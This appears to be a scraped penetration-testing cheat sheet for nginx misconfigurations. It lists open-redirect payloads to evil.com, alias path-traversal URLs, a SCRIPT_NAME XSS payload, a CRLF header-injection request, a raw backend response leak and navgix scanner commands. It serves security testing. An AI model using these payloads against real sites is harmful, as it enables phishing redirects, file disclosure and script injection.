Configuration file
Copy GET /nginx.conf
GET /nginx/nginx.conf Open Redirect
Copy https://example.com/%5cevil.com
https://example.com////\;@evil.com
https://example.com////evil.com
https://example.com///evil.com
https://example.com///evil.com/%2f%2e%2e
https://example.com///evil.com@//
https://example.com///{{RootURL}}evil.com/%2f%2e%2e
https://example.com//;@evil.com
https://example.com//\/evil.com/
https://example.com//\@evil.com
https://example.com//\evil.com
https://example.com//\tevil.com/
https://example.com//evil.com/%2F..
https://example.com//evil.com//
https://example.com//evil.com@//
https://example.com//evil.com\tevil.com/
https://example.com//https://evil.com@//
https://example.com/<>//evil.com
https://example.com/\/\/evil.com/
https://example.com/\/evil.com
https://example.com/\evil.com
https://example.com/evil.com
https://example.com/evil.com/%2F..
https://example.com/evil.com/
https://example.com/evil.com/..;/css
https://example.com/https:evil.com Path traversal via misconfigured NGINX alias
https://example.com/static../ returns the same response as https://example.com/
Copy https://example.com/folder1../folder1/folder2/static/main.css
https://example.com/folder1../%s/folder2/static/main.css
https://example.com/folder1/folder2../folder2/static/main.css
https://example.com/folder1/folder2../%s/static/main.css
https://example.com/folder1/folder2/static../static/main.css
https://example.com/folder1/folder2/static../%s/main.css
Copy http://server/api/user -> http://apiserver/v1//user
http://server/apiuser -> http://apiserver/v1/user Tools
Copy go get github.com/PuerkitoBio/goquery
go get github.com/cristalhq/acmd
go build
./navgix scan -u http://url.com Burp extension
SCRIPT_NAME
Copy GET /index.php/<script>alert(1)</script>/index.php Status page
Copy https://example.com/nginx_status CLRF
Copy http://localhost/%0d%0aDetectify:%20clrf
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.19.3
Content-Type: text/html
Content-Length: 145
Connection: keep-alive
Location: https://example.com/
Detectify: clrf Any variable
Copy $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’ Raw backend response reading
Send an invalid HTTP request, such as:
Copy GET /? XTTP/1.1
Host: 127.0.0.1
Connection: close We will get the following response:
Copy XTTP/1.1 500 Error
Content-Type: text/html
Secret-Header: secret-info
Secret info, should not be visible! merge_slashes
The merge_slashes directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so /// would become /. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it.
Tools
Copy ./navgix scan -u http://vulnerable.com/
[navgix 2024-12-23_02:12:17.731403583] starting scan on http://vulnerable.com/
[navgix 2024-12-23_02:12:17.830559043] Vulnerable: http://vulnerable.com/assets../
[navgix 2024-12-23_02:12:17.926859226] Vulnerable: http://vulnerable.com/assets../ Resources
